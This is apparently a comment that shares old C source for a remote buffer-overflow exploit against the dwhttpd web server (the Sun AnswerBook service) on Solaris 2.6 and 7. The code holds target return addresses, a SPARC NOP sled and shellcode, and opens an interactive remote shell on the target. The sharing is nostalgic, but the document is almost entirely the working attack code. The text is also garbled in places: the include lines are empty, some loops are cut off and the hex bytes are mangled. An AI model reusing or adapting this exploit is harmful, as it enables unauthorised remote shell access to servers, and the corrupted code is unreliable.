Awesome! I’m glad you had fun with that bug also. It’s nice to let some of the old code see the light of day. Maybe we could make an exploit museum someday…

Don’t have a timestamp on it, but it was around the same time.. ~2000/2001-ish I think. Don’t know if this was the finished version.. looks like it probably wasn’t.

/*
* Answerbook remote – horizon
*
* “I have seen the enemy; he looks an awful lot like me.”
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct arch
{
int id;
char *name;
unsigned long addr;
};

struct arch archlist[] =
{
{1, “Solaris 7 (0xff stack) / dwhttpd/4.0.2a7a”, 0xfe509040},
{2, “Solaris 2.6 / dwhttpd/4.0.2a7a”, 0xee909328},
{0, 0, 0}
};

int arch;

#define SPARC_NOP 0xac15a16e

unsigned char sc[]=
{0×90,0x1a,0×40,0×9,0×92,0x1a,0×40,0×9,0×82,0×10,0×20,0×17,0×91,0xd0,0×20,0×8,0×90,0x1a,0×40,0×9,0×92,0x1a,0×40,0×9,0×82,0×10,0×20,0x8d,0×91,0xd0,0×20,0×8,0×90,0×10,0×20,0×9,0×92,0×10,0×20,0×9,0×94,0x1a,0×80,0xa,0×82,0×10,0×20,0x3e,0×91,0xd0,0×20,0×8,0×90,0×10,0×20,0×9,0×92,0×10,0×20,0×9,0×94,0×10,0×20,0×1,0×82,0×10,0×20,0x3e,0×91,0xd0,0×20,0×8,0×90,0×10,0×20,0×9,0×92,0×10,0×20,0×9,0×94,0×10,0×20,0×2,0×82,0×10,0×20,0x3e,0×91,0xd0,0×20,0×8,0x2d,0xb,0xd8,0x9a,0xac,0×15,0xa1,0x6e,0x2f,0xb,0xdc,0xda,0×90,0xb,0×80,0xe,0×92,0×3,0xa0,0×8,0×94,0x1a,0×80,0xa,0x9c,0×3,0xa0,0×10,0xec,0x3b,0xbf,0xf0,0xdc,0×23,0xbf,0xf8,0xc0,0×23,0xbf,0xfc,0×82,0×10,0×20,0x3b,0×91,0xd0,0×20,0×8,0×68,0x6f,0×72,0×69,0x7a,0x6f,0x6e,0x5b,0×41,0×44,0x4d,0x5d,0×31,0×30,0x2f,0×39,0×39,0×0};

unsigned long getip(char *name)
{
struct hostent *hp;
unsigned long ip;

if ((ip = inet_addr(name)) == -1)
{
if ((hp = gethostbyname(name)) == NULL)
{
fprintf(stderr, “Cant resolve host.\n”);
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}

int proxyloop(int s)
{
char buf[8192];
fd_set rset;
int n;

sleep(2);

strcpy(buf, “cd /; uname -a; pwd; id;\n”);
write(s, buf, strlen(buf));

for (;;)
{
FD_ZERO(&rset);
FD_SET(0,&rset);
FD_SET(s, &rset);
select(s+1, &rset, NULL, NULL, NULL);
if (FD_ISSET(0, &rset))
{
if ((n=read(0,buf,sizeof(buf)))<=0)
exit(0);
write(s, buf, n);
}
if (FD_ISSET(s, &rset))
{
if ((n=read(s,buf,sizeof(buf)))<=0)
exit(0);
write(1, buf, n);
}
}
return 0;
}

int conn(unsigned long server, unsigned short port)
{
int s;
struct sockaddr_in sa;

bzero(&sa, sizeof(sa));

sa.sin_family=AF_INET;
sa.sin_port=htons(port);
sa.sin_addr.s_addr=server;

if ((s=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror(“socket”);
exit(42);
}

if (connect(s, (struct sockaddr *)&sa, sizeof (sa))==-1)
{
perror(“connect”);
exit(42);
}
return s;
}

int main(int argc, char **argv)
{
int i,s,offset;
char buf[8192];
unsigned long nop=SPARC_NOP;
char *walker;

if (argc<2)
{
fprintf(stderr,”Usage: %s arch hostname\n”,argv[0]);
fprintf(stderr,”Available architectures:\n”);
i=-1;
while (archlist[++i].id)
fprintf(stderr,” %d: %s\n”,archlist[i].id,archlist[i].name);
exit(1);
}

arch=atoi(argv[1])-1;

s=conn(getip(argv[2]),8888);

strcpy(buf,”GET %3800u”);

walker=&(buf[strlen(buf)]);

for (i=0;i>24)&255);
*walker++=((archlist[arch].addr>>16)&255);
*walker++=((archlist[arch].addr>>8)&255);
*walker++=((archlist[arch].addr)&255);
}

strcpy(walker, ” HTTP/1.0\r\n”);

write(s, buf, strlen(buf));
buf[0]=’A';
buf[1]=’A';
buf[2]=’A';
walker=buf+3;
for (i=0;i>24)&255);
*walker++=((SPARC_NOP>>16)&255);
*walker++=((SPARC_NOP>>8)&255);
*walker++=((SPARC_NOP)&255);
}

sprintf(walker,”%s\r\n\r\n”,sc);
write(s, buf, strlen(buf));
proxyloop(s);
}

-Nate